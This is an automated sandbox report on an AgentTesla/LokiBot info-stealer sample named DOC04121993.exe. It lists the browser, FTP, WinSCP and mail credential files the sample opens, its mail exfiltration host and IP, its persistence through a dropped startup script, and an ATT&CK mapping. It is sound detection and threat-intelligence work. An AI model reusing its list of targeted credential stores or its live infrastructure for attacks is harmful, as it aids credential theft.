                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DOC04121993.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00470848 GetSystemTime,ExitProcess,73BBB110,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233A502 GetUserNameW,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00447320 GetVersion,
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: DOC04121993.exe, 00000000.00000002.198459774.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 2576, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 5080, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 1956, type: MEMORY
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2290000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.2240000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2150000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.980000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.21b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.1.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.DOC04121993.exe.2750000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.980000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DOC04121993.exe.2690000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.9e0000.2.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 2576, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 5080, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOC04121993.exe PID: 1956, type: MEMORY
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2290000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.2240000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2150000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.980000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.21b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.1.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.DOC04121993.exe.2750000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.980000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DOC04121993.exe.2690000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.DOC04121993.exe.9e0000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping2System Time Discovery11Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting111Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture21Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Registry Run Keys / Startup Folder2Access Token Manipulation1Scripting111Credentials in Registry1File and Directory Discovery3SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Process Injection412Obfuscated Files or Information2NTDSSystem Information Discovery128Distributed Component Object ModelEmail Collection1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder2Software Packing41LSA SecretsQuery Registry1SSHInput Capture21Data Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsSecurity Software Discovery271VNCClipboard Data2Exfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion15DCSyncVirtualization/Sandbox Evasion15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 321396 Sample: DOC04121993.exe Startdate: 21/11/2020 Architecture: WINDOWS Score: 100 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 4 other signatures 2->41 7 DOC04121993.exe 2->7         started        10 wscript.exe 1 2->10         started        process3 signatures4 43 Detected unpacking (changes PE section rights) 7->43 45 Detected unpacking (creates a PE file in dynamic memory) 7->45 47 Detected unpacking (overwrites its own PE header) 7->47 49 7 other signatures 7->49 12 DOC04121993.exe 4 7->12         started        16 notepad.exe 1 7->16         started        18 DOC04121993.exe 7->18         started        20 DOC04121993.exe 10->20         started        process5 dnsIp6 31 hybridgroupco.com 66.70.204.222, 49731, 587 OVHFR Canada 12->31 33 mail.hybridgroupco.com 12->33 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->51 53 Tries to steal Mail credentials (via file access) 12->53 55 Tries to harvest and steal ftp login credentials 12->55 57 Tries to harvest and steal browser information (history, passwords, etc) 12->57 59 Drops VBS files to the startup folder 16->59 61 Delayed program exit found 16->61 63 Writes to foreign memory regions 20->63 65 Allocates memory in foreign processes 20->65 67 Maps a DLL or memory area into another process 20->67 22 notepad.exe 1 20->22         started        25 DOC04121993.exe 20->25         started        27 DOC04121993.exe 20->27         started        signatures7 process8 file9 29 C:\Users\user\AppData\Roaming\...\STARTUP.vbs, ASCII 22->29 dropped

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DOC04121993.exe69%VirustotalBrowse
                      DOC04121993.exe81%ReversingLabsWin32.Trojan.LokiBot
                      DOC04121993.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.1.DOC04121993.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.DOC04121993.exe.2240000.3.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.DOC04121993.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                      7.2.DOC04121993.exe.21b0000.2.unpack100%AviraHEUR/AGEN.1138205Download File
                      7.2.DOC04121993.exe.2290000.3.unpack100%AviraTR/Spy.Gen8Download File
                      0.2.DOC04121993.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                      5.2.DOC04121993.exe.2750000.3.unpack100%AviraTR/Spy.Gen8Download File
                      0.2.DOC04121993.exe.2690000.3.unpack100%AviraHEUR/AGEN.1138205Download File
                      5.2.DOC04121993.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                      0.2.DOC04121993.exe.22e0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.1.DOC04121993.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.DOC04121993.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      2.2.DOC04121993.exe.9e0000.2.unpack100%AviraHEUR/AGEN.1138205Download File
                      7.2.DOC04121993.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      hybridgroupco.com0%VirustotalBrowse
                      mail.hybridgroupco.com10%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:0%VirustotalBrowse
                      http://127.0.0.1:0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/U0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/U0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/U0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/U0%URL Reputationsafe
                      http://vd2JBRKVM6n.net0%Avira URL Cloudsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
                      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
                      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
                      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://vd2JBRKVM6n.net$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      hybridgroupco.com
                      66.70.204.222
                      truetrueunknown
                      mail.hybridgroupco.com
                      unknown
                      unknowntrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/DOC04121993.exefalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/UDOC04121993.exe, 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://vd2JBRKVM6n.netDOC04121993.exe, 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://cps.letsencrypt.org0DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org/bot%telegramapi%/DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpfalse
                        high
                        http://cert.int-x3.letsencrypt.org/0DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpfalse
                          high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipDOC04121993.exefalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ocsp.int-x3.letsencrypt.org0/DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://cps.root-x1.letsencrypt.org0DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://vd2JBRKVM6n.net$DOC04121993.exe, 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          66.70.204.222
                          unknownCanada
                          16276OVHFRtrue

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:321396
                          Start date:21.11.2020
                          Start time:10:35:20
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 11m 8s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:DOC04121993.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@16/2@1/1
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 90.3% (good quality ratio 87.7%)
                          • Quality average: 84.7%
                          • Quality standard deviation: 25%
                          HCA Information:
                          • Successful, ratio: 75%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                          • Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 104.42.151.234, 51.104.139.180, 92.122.213.247, 92.122.213.194, 92.122.144.200, 20.54.26.129, 51.104.144.132, 51.11.168.160
                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:36:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
                          10:36:22API Interceptor824x Sleep call for process: DOC04121993.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          66.70.204.222PI.exeGet hashmaliciousBrowse
                            d9f83622ec1564600202a937d2414af8.exeGet hashmaliciousBrowse
                              Image001.exeGet hashmaliciousBrowse
                                mEPbT6Dbzc.exeGet hashmaliciousBrowse
                                  b32sUgpVdT.exeGet hashmaliciousBrowse
                                    ZXeB2BO1Lq.exeGet hashmaliciousBrowse
                                      kiGANMAmR3.exeGet hashmaliciousBrowse
                                        QM34U1x8I6.exeGet hashmaliciousBrowse
                                          Y2UrKCOaJm.exeGet hashmaliciousBrowse
                                            SJAOO8OCe3.exeGet hashmaliciousBrowse
                                              zh7966Pn0I.exeGet hashmaliciousBrowse
                                                o7B4zT1WNb.exeGet hashmaliciousBrowse
                                                  emMAbUc8Xg.exeGet hashmaliciousBrowse
                                                    a2onj1GOHs.exeGet hashmaliciousBrowse
                                                      RDp6VoVSfQ.exeGet hashmaliciousBrowse
                                                        DUE_INVOICE.exeGet hashmaliciousBrowse
                                                          2M3ZdRze7b.exeGet hashmaliciousBrowse
                                                            36n0FgVGxo.exeGet hashmaliciousBrowse
                                                              ErKsKTqlS4.exeGet hashmaliciousBrowse
                                                                yrPgLCinv1.exeGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  OVHFRPI.exeGet hashmaliciousBrowse
                                                                  • 66.70.204.222
                                                                  https://faxfax.zizera.com/remittanceadviceGet hashmaliciousBrowse
                                                                  • 167.114.119.127
                                                                  https://coralcliffs.com.do/review/Get hashmaliciousBrowse
                                                                  • 188.165.231.37
                                                                  https://rugbysacele.ro/zz/IK/of1/nhctfwp4x278qkbusvijl6z39y5ema1o0gdr597irqhw4x0fk3uevzlaoj12bdmpsnt8g6yce40h6iv7bprsowxd3z2nmu8kal5gcj1yf9qt?data=dmluY2VudC5kdXNvcmRldEBpbWQub3Jn#aHR0cHM6Ly9ydWdieXNhY2VsZS5yby96ei9JSy9vZjEvNDUzMjY3NzY4JmVtYWlsPXZpbmNlbnQuZHVzb3JkZXRAaW1kLm9yZw==Get hashmaliciousBrowse
                                                                  • 51.195.133.190
                                                                  http://flossdental.com.auGet hashmaliciousBrowse
                                                                  • 46.105.201.240
                                                                  https://bit.ly/2UDM1ToGet hashmaliciousBrowse
                                                                  • 54.38.220.151
                                                                  inquiry-010.14.2020.docGet hashmaliciousBrowse
                                                                  • 94.23.162.163
                                                                  http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                  • 51.89.9.253
                                                                  http://septterror.tripod.com/the911basics.htmlGet hashmaliciousBrowse
                                                                  • 51.89.9.253
